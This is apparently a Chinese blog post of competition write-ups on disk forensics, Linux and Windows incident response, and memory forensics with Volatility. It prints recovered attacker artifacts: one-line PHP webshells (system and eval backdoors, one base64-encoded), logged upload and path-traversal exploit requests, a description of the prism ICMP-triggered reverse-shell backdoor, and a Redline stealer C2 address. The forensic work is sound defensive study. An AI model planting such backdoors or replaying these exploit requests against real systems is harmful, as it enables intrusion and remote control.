信安大赛篇

单机取证篇

22年国赛单机取证

Evidence4

先搜索Evidence

img

找到一个

img

Evidence4
  nsOh2.png
  f5b9ce3e485314c23c40a89d994b2dc8

Evidence2

之后再一个个找

这个是压缩包格式的

img

导出来

伪加密

img

修复一下

img

img

Evidence2
  ZQOo2.jpg
  9e69763ec7dac69e2c5b07a5955a5868

Evidence3

png的文件

img

改个宽高

img

img

Evidence3
  p3qQ4.jpg
  a9a18aecec905a7742042461595b4b5c

Evidence6

mp3的格式

img

png的格式

img

再对照表就好

img

Evidence6
  mkjRv.7z
  e610fcd2a0cd53d158e8ee4bb088100a

Evidence5

img

这个也是错误格式

strings得到

img

img

IV3GSZDFNZRWKNI=

img

Evidence5
  RVlYt.zip
  d6638c17b2e700397ab2e02cbd079dae

Evidence9

img

Evidence9
  jMH7w.xlsx
  523c407180d54dde6eca700405599c8a

Evidence7

png格式的

img

img

Evidence7
  OR8iq.xml
  28ba933c31fd60f8c4461aed14a8c447

Evidence10

img

img

Evidence10
  01d98.gif
  d708444963b79da344fd71e5c72f7f02

Evidence1

img

img

Evidence1
  eg2kX.jpg
  85cdf73518b32a37f74c4bfa42d856a6

Evidence8

img

img

Evidence8
  8cFQj.py
  7fccfb1778b15fbc09deb6690afc776a

2023福建省单机取证

evidence 10

直接搜索找到了evidence 10

img

Evidence10
  topy.docx
  04b87697a5fd9e168ced165d21d177e3

evidence 7

png后缀

img

img

改高度得到

img

evidence 7
  wb.zip
  cdc07e85116b037c40351c49da6eb35a

evidence 1

img

img

evidence 1
  sys.dll
  d3c5335367e17b966a13e2663235a1ff

evidence 5

img

zip文件

img

补全文件头

img

解压得到jpg文件

img

evidence 5
  tmp
  da5d01d2f7e8c37ab1c1857be587ad74

evidence 2

img

evidence 2
  tag
  43168b2bdf149526b8bb8b89f1b06cc1

evidence 3

img

有隐藏图片,不过没用

strings hack.png | tail -60

img

echo IV3GSZDFNZRWKMYK | base32 --decode

img

evidence 3
  hack.png
  1308b0d65360eba6a47224733f13ca84

evidence 4

img

lsb隐写

img

evidence 4
  sea.png
  1c990420fc307c7bd2b65396c5e5e13f

evidence 8

img

evidence 8
  display
  8b2da168f3221d343c4e3f1aceed3e88

evidence 9

img

.7z文件

解压是bmp格式图片

img

img

evidence 9
  z.x
  14046db8621b2aca9ffced76d23cc6e9

evidence 6

img

evidence 6
  cve.xlsx
  c2b9d953d7e04c8e0d08fee3bd4513cd

应急响应篇

Ubuntu应急响应

1 提交攻击者的IP地址
2 识别攻击者使用的操作系统
3 找出攻击者资产收集所使用的平台
4 提交攻击者目录扫描所使用的工具名称
5 提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS
6 找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码
7 找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)
8 识别系统中存在的恶意程序进程,提交进程名
9 找到文件系统中的恶意程序文件并提交文件名(完整路径)
10 简要描述该恶意文件的行为

root

1234546

1.提交攻击者的IP地址

一直找日志

是这个

more access.log.1 

img

img

从192.168.1.5到192.168.1.7就不一样了猜测攻击者是192.168.1.7

192.168.1.5 - - [24/Apr/2022:15:11:48 +0000] "GET /data/captcha/ckstr.php HTTP/1.1" 200 1499 "http://192.168.1.3/message.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"::1 - - [24/Apr/2022:15:11:55 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) (internal dummy connection)"
192.168.1.7 - - [24/Apr/2022:15:14:32 +0000] "GET / HTTP/1.1" 408 482 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:14:52 +0000] "GET /favicon.ico HTTP/1.1" 200 39411 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET / HTTP/1.1" 200 3663 "https://www.shodan.io/search?query=php" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET /templates/default/style/webstyle.css HTTP/1.1" 200 6599 "http://192.168.1.3/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

192.168.1.7

2.识别攻击者使用的操作系统

192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET /templates/default/style/webstyle.css HTTP/1.1" 200 6599 "http://192.168.1.3/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

Linux x86_64

3.找出攻击者资产收集所使用的平台

shodan.io

img

日志中找到

img

shodan.io

4.提交攻击者目录扫描所使用的工具名称

img

192.168.1.7 - - [24/Apr/2022:15:17:45 +0000] "GET /rHdA9nYoF68B HTTP/1.1" 404 43
4 "-" "DIRSEARCH"

DIRSEARCH

5.提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS

img

192.168.1.7 - - [24/Apr/2022:15:25:53 +0000] "GET /shoppingcart.php?a=addshopinggcart&goodsid=1&buynum=2&goodsattr=as%26time=999999999999999999%26uid=/../../../pproc/self/cwd/1.php%26a=1 HTTP/1.1" 200 425 "-" "python-requests/2.23.0"
192.168.1.7 - - [24/Apr/2022:15:25:53 +0000] "POST //data/avatar/upload.php?a=upploadavatar&input=2690b1IhecCIpeAK%2BnPLfbnP3AF%2F9TwHSnAxI%2BAfZ%2BC0xIaO33AMyGeeGhpEIO2WxXowgLJ%2FFbPKzhcd1x4Xlwdbs1Pjg5V6Yy2MSj1yzlbw6eHXc6Mu%2FZ5BSbVUolg2kh400WeVCGgHRYc4Zu8X4VONadz5WOuerWpdPmDRtAjQb8lZjMVQDSPgY&_SERVER%5BHTTP_USER_AGENT%55D%5B%5D=1 HTTP/1.1" 200 296 "-" "python-requests/2.23.0"

这两条日志

先是上传了一个php文件

然后命令执行了

24/Apr/2022:15:25:53

24/04/22:15:25:53

6.找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码

根据上题日志

上传了一个1.php

find / -name 1.php

img

img

root@webserver:/# cd /var/www/html/data/avatar
root@webserver:/var/www/html/data/avatar# ls
1.php  images  index.php  lib  upload.php
root@webserver:/var/www/html/data/avatar# cat 1.php
<?php system($_GET[2022]);?>
        #define width 20
        #define height 20

文件名:1.php

后门密码:2022

7.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)

img

root@webserver:/var/www/html# cat footer.php 
<!-- weblink-->

<div class="weblink">
        <?php
        $dosql->Execute("SELECT * FROM `#@__weblink` WHERE classid=1 AND checkinfo=true ORDER BY orderid,id DESC");
        while($row = $dosql->GetArray())
        {
        ?>
        <a href="<?php echo $row['linkurl']; ?>" target="_blank"><?php echo $row['webname']; ?></a>
        <?php
        }
        ?>
</div>
<!-- /weblink-->
<!-- footer-->
<div class="footer"><?php echo $cfg_copyright ?><br />网站采用 <a href="http://phpmywind.com" target="_blank">PHPMyWind</a> 核心</div>
<!-- /footer-->
<?php
@eval($_POST['catchmeifyoucan'])
echo GetQQ();

//将流量统计代码放在页面最底部
$cfg_countcode;

?>

一个后门

/var/www/html/footer.php

8.识别系统中存在的恶意程序进程,提交进程名

ps aux

img

cat prism

img

9.找到文件系统中的恶意程序文件并提交文件名(完整路径)

根据上题

/root/.mal/prism

10.简要描述该恶意文件的行为

根据上上题

img

等待来自攻击者的ICMP数据包,该数据包包含要回连的主机、端口和密钥,被激活后将/bin/sh回连到主机指定端口,供攻击者执行命令

windows服务器应急响应

首先环境是这样的,比linux应急响应好多了,有图形界面...

img

1.请提交攻击者攻击成功的第一时间,格式:YY:MM:DD hh:mm:ss

在phpstudy目录下搜索日志文件

img

省赛用的是别人的工具,只能肉眼观察喽,个人习惯于010,可惜省赛有可能不提供...

img

这条是登录了管理员账号

29/Apr/2023:22:45:23

23:04:29 10:45:23

2.请提交攻击者的浏览器版本

img

Firefox/110.0

3.请提交攻击者目录扫描所使用的工具名称

img

Fuzz Faster U Fool

4.找到攻击者写入的恶意后门文件,提交文件名(完整路径)

img

C:\phpstudy_pro\WWW.x.php

5.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)

img

img

PD9waHAgQGV2YWwoJF9SRVFVRVNUWyd4J10pOyA/Pg==

img

C:\phpstudy_pro\WWW\usr\themes\default\post.php

6.请提交内存中可疑进程的PID

img

在资源监视器里发现有外联

1200

7.请提交攻击者执行过几次修改文件访问权限的命令

img

2

8.请指出可疑进程采用的自动启动的方式

策略组->计算机配置->Windows设置->脚本(启动/关机)->启动->属性

发现自启动了一个bat脚本

img

内存取证篇

某省赛题

1.请提交内存中恶意进程的名称

用pslist插件查看进程

img

看到有两个powershe11

powershe11.exe

2.请提交恶意进程写入的文件名称(不含路径)

用memdump提取出恶意程序

img

strings

img

hilyary.txt

3.请提交 admin 账户的登录密码

mimikatz梭了

img

要是没有这个插件,hashdump这个插件也可以

img

img

123456

4.请提交攻击者创建的账户名称

查看注册表,之后一级一级查看

img

找到所有用户,但不知道哪个是攻击者创建的用户,

也是一级一级查看,找到Price

img

5.请提交在桌面某文件中隐藏的 flag 信息,格式:flag

filescan查看文件

img

找到一个skills

提取出来

img

010看到flag

img

2024山东省赛题

事件描述:您的任务是使用 Redline 和 Volatility 工具分析内存转储。您的目标是跟踪攻击者在受感染计算机上采取的步骤,并确定他们如何设法绕过网络入侵检测系统“NIDS”。您的调查将涉及识别攻击中使用的特定恶意软件系列及其特征。此外,您的任务是识别和缓解攻击者留下的任何痕迹或足迹。

1.目标可疑进程的名称是什么?

2.提交可疑进程的子进程名称

3.可疑进程内存区域的内存地址

4.负责VPN连接的进程的名称是什么?

5.攻击者的 IP 地址是什么?

6.查看你恶意软件家族的名称是什么?

7.攻击者访问的PHP文件的完整URL是什么?

8.恶意可执行文件的完整路径是什么?

1.目标可疑进程的名称是什么?

vol.py -f 1.mem --profile=Win10x64_19041 malfind

img

oneetx.exe

2.提交可疑进程的子进程名称

python3 vol.py -f 1.mem windows.pstree

img

rundll32.exe

#vol2下是这个命令

vol.py -f 1.mem --profile=Win10x64_19041 pstree

img

3.可疑进程内存区域的内存地址

vol.py -f 1.mem --profile=Win10x64_19041 malfind

img

0x400000

4.负责VPN连接的进程的名称是什么?

python3 vol.py -f 1.mem windows.psscan

img

Outline.exe

5.攻击者的 IP 地址是什么?

python3 vol.py -f 1.mem windows.netscan | grep oneetx.exe

img

77.91.124.20

6.查看你恶意软件家族的名称是什么?

strings 1.mem | grep Redline

img

Redlinestealer

7.攻击者访问的PHP文件的完整URL是什么?

strings 1.mem | grep 77.91.124.20

img

http://77.91.124.20/store/games/index.php

8.恶意可执行文件的完整路径是什么?

strings 1.mem | grep oneetx.exe

img

C:\Users\Tammam\AppData\Local\Temp\c3912af058\oneetx.exe

posted @   WTT0011  阅读(53)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· DeepSeek 开源周回顾「GitHub 热点速览」
· 记一次.NET内存居高不下排查解决与启示
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· .NET10 - 预览版1新功能体验(一)
点击右上角即可分享
微信分享提示